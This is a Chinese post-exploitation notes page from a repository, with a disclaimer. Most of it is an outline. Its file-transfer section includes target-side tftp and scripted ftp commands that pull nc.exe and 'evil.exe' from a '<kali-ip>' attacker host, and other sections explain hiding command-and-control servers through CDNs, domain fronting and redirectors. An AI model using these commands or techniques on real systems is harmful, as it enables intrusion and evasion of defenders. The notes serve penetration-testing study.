Skip to content

Latest commit

 

History

History
420 lines (301 loc) · 11.7 KB

后渗透.md

File metadata and controls

420 lines (301 loc) · 11.7 KB

后渗透


免责声明

本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.


大纲


后渗透案例


横向扩展

基于IPC$的横向

PTH/PTK/PTT


基于RPC的taskexec

相关文章


文件传输

相关文章

web-servers

相关工具

本地服务

以下部分内容来自 部分内容来自 部分内容来自项目 [willurd/web-servers.md]

在当前目录起个 8000 端口的 HTTP 服务

  • Python 2.x

    python -m SimpleHTTPServer 8000
  • Python 3.x

    python3 -m http.server 8000 --bind 0.0.0.0
  • Twisted (Python)

    twistd -n web -p 8000 --path .

    or

    python -c 'from twisted.web.server import Site; from twisted.web.static import File; from twisted.internet import reactor; reactor.listenTCP(8000, Site(File("."))); reactor.run()'
  • Ruby

    ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => Dir.pwd).start'
  • Ruby 1.9.2+

    ruby -run -ehttpd . -p8000
  • adsf (Ruby)

    gem install adsf   # install dependency
    adsf -p 8000
  • Sinatra (Ruby)

    gem install sinatra   # install dependency
    ruby -rsinatra -e'set :public_folder, "."; set :port, 8000'
  • Perl

    cpan HTTP::Server::Brick   # install dependency
    perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>8000); $s->mount("/"=>{path=>"."}); $s->start'
  • Plack (Perl)

    cpan Plack   # install dependency
    plackup -MPlack::App::Directory -e 'Plack::App::Directory->new(root=>".");' -p 8000
  • Mojolicious (Perl)

    cpan Mojolicious::Lite   # install dependency
    perl -MMojolicious::Lite -MCwd -e 'app->static->paths->[0]=getcwd; app->start' daemon -l http://*:8000
  • http-server (Node.js)

    npm install -g http-server   # install dependency
    http-server -p 8000
  • node-static (Node.js)

    npm install -g node-static   # install dependency
    static -p 8000
  • PHP (>= 5.4)

    php -S 127.0.0.1:8000
  • Erlang

    erl -s inets -eval 'inets:start(httpd,[{server_name,"NAME"},{document_root, "."},{server_root, "."},{port, 8000},{mime_types,[{"html","text/html"},{"htm","text/html"},{"js","text/javascript"},{"css","text/css"},{"gif","image/gif"},{"jpg","image/jpeg"},{"jpeg","image/jpeg"},{"png","image/png"}]}]).'
  • busybox httpd

    busybox httpd -f -p 8000
  • webfs

    webfsd -F -p 8000
  • IIS Express

    C:\> "C:\Program Files (x86)\IIS Express\iisexpress.exe" /path:C:\MyWeb /port:8000

FTP

tftp

基于 udp,端口为 69

  • 攻击端起 tftp

    mkdir /tftp
    atftpd --daemon --port 69 /tftp
    cp /usr/share/windows-binaries/nc.exe /tftp/
    chown -R nobody /tftp
  • 目标机

    tftp -i <kali-ip> GET nc.exe

ftp

  • 攻击端

    apt-get install -y pure-ftpd
    
    groupadd ftpgroup
    useradd -g ftpgroup -d /dev/null -s /etc ftpuser
    pure-pw useradd username -u ftpuser -d /ftphome
    pure-pw mkdb
    cd /etc/pure-ftpd/auth/
    ln -s ../conf/PureDB 60pdb
    mkdir -p /ftphome
    chown -R ftpuser:ftpgroup /ftphome/
    /etc/init.d/pure-ftpd restart
    ./setup-ftp(输入要设置的密码)

    攻击端使用 python 起 ftp:

    pip3 install pyftpdlib
    cd /tmp
    python3 -m pyftpdlib -p 8888
    

    此时目标机连接的时候,用户名为 anonymous,密码随意

  • 目标机 目标机的远程 shell 上运行

    echo open <kali-ip> 21> ftp.txt
    echo username>> ftp.txt
    echo password>> ftp.txt
    echo bin >> ftp.txt
    echo GET evil.exe >> ftp.txt
    echo bye >> ftp.txt
    ftp -s:ftp.txt

    目标机上传文件(连接状态):

    ftp> put target.exe(如果是 windows 且文件在其他盘,需使用绝对路径)

    关闭 ftp:

    /etc/init.d/pure-ftpd stop

    windows下

    ftp
    username
    password
    get file
    exit 或者 bye
    
    ftp -s:test.txt
    

Linux lol

Win lol


隐匿技术

流量隐藏技术

相关文章

端口转发

隧道

代理


C2隐藏技术

相关工具

相关文章

CDN

让 cdn 转发合法的 http 或者 https 流量来达到隐藏的目的。

受害主机上只会有跟 cdn 的 ip 通信的流量,不会有跟真实 C2 通信的流量,可以保护 C2 的 ip,但是域名还是会暴露。

相关文章

实验

域前置

Domain fronting

同一个 cdn 厂商下倘若有两个域名 a.com,b.com,这两个主机都是被 ip 为 1.1.1.1 的 cdn 进行加速的。这时候我们使用 curl 命令访问第一个 a.com 并将 host 名改为 b.com 这时候,实际访问的是 b.com 的内容。而一般的监测机制是不会检测 host 头的。

curl 1.1.1.1 -v     # 无内容
curl 1.1.1.1 -H "Host: www.ffffffff0x.com" -v   # 访问到 cdn 下站点的内容

通过一个高信任域名隐藏自己的真实域名与 ip,且受害主机上只有跟 cdn 通信的流量。

相关文章

重定向

两台 vps,一台做重定向,一台是真正的 C2,而受害者只与那台做重定向的机器通信,重定向机器只会转发来自 beacon 的特定流量到 C2 控制端主机,对于其他流量可以自定义设置处理方法,一般是采用重定向到一些高信誉域名上例如百度等。

受害者上只会有与重定向机器之间的流量,不会有与真实 c2 服务器的流量,重定向服务器会将非 beacon 的请求重定向到一些高信誉域名上,达到迷惑的目的,不过如果受害者 ban 掉了重定向机器的 ip,对攻击者的损失也是很大的。

相关文章

相关项目

实验


侧信道

相关文章

相关工具


权限提升


权限维持


windows域

域渗透相关文章(总结类)

相关工具

域基础知识

域认证

  • 关于 windows 域认证的基本知识点可见笔记 认证

域环境

  • 关于 windows 域环境组成的基本知识点可见笔记 认证

域环境搭建

  • 关于 windows 域认证的基本知识点可见笔记 认证

域内信息收集

Exchange

认证

跨域